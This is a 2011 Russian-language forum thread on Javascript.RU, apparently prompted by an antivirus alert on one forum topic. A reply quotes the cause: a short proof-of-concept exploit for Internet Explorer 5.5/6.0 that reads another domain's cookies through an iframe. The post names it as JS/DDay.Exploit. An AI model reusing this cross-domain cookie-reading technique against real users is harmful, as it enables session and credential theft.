Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 25.08.2011, 15:55
х.з
Посмотреть профиль Найти все сообщения от dmitriymar
 
Регистрация: 21.11.2010
Сообщений: 4,589

вирусня на форуме
Ответить с цитированием
  #2 (permalink)  
Старый 25.08.2011, 16:09
Аватар для B@rmaley.e><e
⊞ Развернуть
Отправить личное сообщение для B@rmaley.e><e Посмотреть профиль Найти все сообщения от B@rmaley.e><e
 
Регистрация: 11.01.2010
Сообщений: 1,810

Ложная тревога.
Ответить с цитированием
  #3 (permalink)  
Старый 25.08.2011, 17:17
х.з
Посмотреть профиль Найти все сообщения от dmitriymar
 
Регистрация: 21.11.2010
Сообщений: 4,589

все темы норм ,только в этой как подгрузить js код со страницы!??
антивирус кричит
Ответить с цитированием
  #4 (permalink)  
Старый 25.08.2011, 17:19
sinistral
Посмотреть профиль Найти все сообщения от melky
 
Регистрация: 28.03.2011
Сообщений: 5,418

ну раз там эксплоит js, то это должно заставить его кричать

<script language="jscript"> 
 onload=function () { 
 // Timer necessary to prevent weird behavior in some conditions 
 setTimeout( 
 function () { 
 alert(document.getElementById("oVictim").Document.cookie); 
 }, 
 100 
 ); 
 } 
 </script> 
 <iframe src="http://google.com" id="oVictim"></iframe>
Ответить с цитированием
  #5 (permalink)  
Старый 25.08.2011, 17:25
Новичок на форуме
Отправить личное сообщение для Kolyaj Посмотреть профиль Найти все сообщения от Kolyaj
 
Регистрация: 19.02.2008
Сообщений: 9,177

Вставляйте этот код в тему, если хотите, чтобы dmitriymar не читал её
Ответить с цитированием
  #6 (permalink)  
Старый 25.08.2011, 17:42
х.з
Посмотреть профиль Найти все сообщения от dmitriymar
 
Регистрация: 21.11.2010
Сообщений: 4,589

Kolyaj,
не прокатывает-сюда я могу зайти хоть и melky,
поставил
Ответить с цитированием
  #7 (permalink)  
Старый 25.08.2011, 17:59
sinistral
Посмотреть профиль Найти все сообщения от melky
 
Регистрация: 28.03.2011
Сообщений: 5,418

JS/DDay.Exploit

Цитата:
This vulnerability affects Internet Explorer 5.5 and 6.0 (this vulnurebility isn't present after IE 6.0 service pack 1 has been applied). ..
это этот код вызывает опасения у нода
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Где посмотреть оставленные тобой сообщения на форуме? Pug-dog&Elephant Оффтопик 2 01.06.2011 10:55
Регистрация на форуме alex_89 Events/DOM/Window 3 10.05.2011 16:44
О сдельной работе на форуме FINoM Оффтопик 21 06.03.2011 11:40
Ввести тестирование при регистрации в форуме vladlen Сайт Javascript.ru 10 12.11.2010 18:37